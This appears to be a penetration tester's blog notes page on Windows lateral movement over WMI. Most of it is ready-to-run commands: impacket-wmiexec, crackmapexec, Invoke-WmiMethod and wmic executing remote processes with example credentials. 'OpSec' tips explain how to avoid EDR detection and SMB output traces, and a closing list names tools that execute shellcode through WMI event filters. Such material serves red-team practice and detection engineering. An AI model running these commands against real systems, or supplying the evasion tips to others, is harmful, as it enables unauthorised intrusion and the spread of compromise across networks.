WMI Lateral Movement

05.06.2024 · dadevel

Lateral Movement over WMI.

The classic method uses the Win32_Process class to execute a command that writes the output to file and download the output via SMB.

impacket-wmiexec -shell-type powershell -k -no-pass srv01.corp.local
impacket-wmiexec -shell-type powershell -silentcommand -nooutput -k -no-pass srv01.corp.local "$(< ./shell.ps1)"

OpSec: When -silentcommand is specified the command is not execute with cmd.exe. When -nooutput is specified the output is not written to a file and no SMB connection is made.

crackmapexec smb srv01.corp.local -u jdoe -p 'passw0rd' --exec-method wmiexec -x 'whoami /all'

OpSec: Many EDRs detecte the use of -X.

$c = New-Object System.Management.Automation.PSCredential -ArgumentList ('jdoe', (ConvertTo-SecureString 'passw0rd' -AsPlainText -Force))
Invoke-WmiMethod -Credential $c -Class Win32_Process -Name Create -ArgumentList 'whoami /all' -ComputerName srv01.corp.local
wmic.exe /node:srv01.corp.local /user:"corp\jdoe" /password:"passw0rd" process call create "whoami /all 1> C:\Windows\Temp\out.txt 2>&1"

Note: If moving laterally over WMI while impersonating a token fails with error 5 you probably run into The Curious Case of CoInitializeSecurity. Try again from a different process.

Untested tools:

  • PerfExec, DLL execution trough Performance Monitor, see Performance, Diagnostics, and WMI
  • wmiexec, command execution by creating scheduled task over WMI, no SMB interaction
  • wmiexec-pro, command execution with output retrieval and file upload/download, no SMB interaction
  • LiquidSnake, creates a WMI event filter that executes VBScript that loads a .NET assembly that executes your shellcode